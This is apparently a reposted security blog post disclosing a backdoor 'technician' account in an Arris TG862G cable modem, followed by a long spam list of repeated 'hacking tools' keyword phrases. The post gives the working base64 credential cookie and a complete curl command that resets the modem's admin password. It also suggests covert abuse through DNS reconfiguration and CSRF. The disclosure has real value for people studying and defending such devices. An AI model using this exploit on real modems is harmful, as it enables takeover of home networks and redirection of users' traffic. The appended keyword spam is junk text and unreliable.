Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.

More information

1. Pentest Tools Port Scanner
2. Pentest Tools For Mac
3. Pentest Tools Android
4. Hacking Apps
5. Kik Hack Tools
6. Hacker Tools For Mac
7. Hacking Tools 2019
8. Hacking Tools Name
9. Hacker Tools For Ios
10. Hack Tools Pc
11. Hacker Tools Mac
12. Top Pentest Tools
13. Hacking Tools Github
14. Nsa Hack Tools
15. Hacker Tool Kit
16. Hacking Tools For Mac
17. Growth Hacker Tools
18. Easy Hack Tools
19. Best Hacking Tools 2020
20. Pentest Tools Url Fuzzer
21. Best Hacking Tools 2020
22. Hacker Tools For Mac
23. Hacking Tools Pc
24. Hacking Tools Windows
25. Github Hacking Tools
26. Pentest Box Tools Download
27. Tools 4 Hack
28. Pentest Automation Tools
29. Hack Tools
30. Best Pentesting Tools 2018
31. Github Hacking Tools
32. Hacker Tools Hardware
33. World No 1 Hacker Software
34. Github Hacking Tools
35. Ethical Hacker Tools
36. Install Pentest Tools Ubuntu
37. Pentest Tools Android
38. Hack Tool Apk No Root
39. Hacking Apps
40. Top Pentest Tools
41. Hacking App
42. Hack Tool Apk No Root
43. Hacking Tools Windows 10
44. Hackers Toolbox
45. Hackers Toolbox
46. Pentest Recon Tools
47. Pentest Tools Github
48. Hack Tools For Windows
49. Blackhat Hacker Tools
50. Hacking Tools For Windows
51. Hacking Tools 2019
52. New Hacker Tools
53. Hacking Tools Windows 10
54. Tools For Hacker
55. Hacker Tools Online
56. Pentest Tools Windows
57. Hacking App
58. Pentest Reporting Tools
59. Hacking Apps
60. Hack Tools Online
61. Pentest Tools Website Vulnerability
62. Pentest Tools Free
63. Hack Rom Tools
64. Tools 4 Hack
65. Pentest Tools For Mac
66. Pentest Tools Online
67. Bluetooth Hacking Tools Kali
68. Pentest Tools For Android
69. Hacking Tools For Pc
70. How To Hack
71. Pentest Tools Review
72. Hacking Tools Kit
73. Hack App
74. Pentest Tools Free
75. Nsa Hack Tools Download
76. Hacking Tools For Windows 7
77. Computer Hacker
78. Pentest Tools Website
79. Hack Tools
80. Hack Tools Download
81. Easy Hack Tools
82. Hacker Tools Github
83. Hacking Tools For Mac
84. Hacker Tools Apk
85. Hacking Tools Software
86. Top Pentest Tools
87. Hacker Techniques Tools And Incident Handling
88. Pentest Tools Review
89. Pentest Tools Review
90. Computer Hacker
91. Pentest Tools For Android
92. Hacking Tools For Pc
93. Hacker Tools Free
94. Pentest Tools Review
95. Tools For Hacker
96. How To Install Pentest Tools In Ubuntu
97. Hacking Tools For Pc
98. Hack Tools 2019
99. Pentest Tools Review
100. Hacking Tools Online
101. Pentest Tools For Mac
102. Ethical Hacker Tools
103. Hacking Tools For Pc
104. Hacker Tools For Windows
105. Hacking Tools Hardware
106. Pentest Tools Apk
107. Computer Hacker
108. Hack Tools 2019
109. Hacker Tools For Windows
110. Nsa Hack Tools Download
111. Hack Tools Mac
112. Hack Tools Github
113. Game Hacking
114. Hack App
115. Ethical Hacker Tools
116. Hacking Tools For Pc
117. Hacking Tools For Mac
118. Hack Tools
119. Hack Tools For Pc
120. Easy Hack Tools
121. Hacking Tools For Windows Free Download
122. Hacker Tool Kit
123. Pentest Tools Free
124. Pentest Tools Open Source
125. Hacking App
126. Hacking Tools For Pc
127. Hack Tool Apk No Root
128. Hack Tools Mac
129. How To Make Hacking Tools
130. Hacker Tools Free Download
131. Pentest Tools Review
132. Hacker Search Tools
133. Wifi Hacker Tools For Windows
134. Game Hacking
135. Hacker Hardware Tools
136. Hacker Security Tools
137. Best Hacking Tools 2019
138. Pentest Tools Online
139. What Is Hacking Tools
140. Hacking Tools Pc
141. Computer Hacker
142. Pentest Tools Alternative
143. Pentest Tools Linux
144. Hack Tools For Windows
145. Pentest Tools For Mac
146. Hack Tool Apk No Root
147. Hacker Tools List
148. Hacker Tools For Ios
149. Pentest Tools Free
150. Hacking Tools Mac
151. Pentest Tools Online
152. Computer Hacker
153. Hack Apps
154. Pentest Tools For Windows
155. What Is Hacking Tools
156. Hack Tools For Mac
157. Hacker Tools Free
158. Hacking Apps
159. Hacking Tools For Kali Linux
160. Hacker Tools 2019
161. How To Hack
162. Pentest Tools Port Scanner
163. Pentest Tools Linux
164. New Hacker Tools
165. Pentest Tools Online
166. Hacker Tools 2019
167. Nsa Hack Tools
168. Pentest Tools Subdomain
169. Hak5 Tools
170. Pentest Tools Port Scanner
171. Hack Tools Online
172. Hack Tools For Pc
173. Easy Hack Tools
174. Pentest Tools Review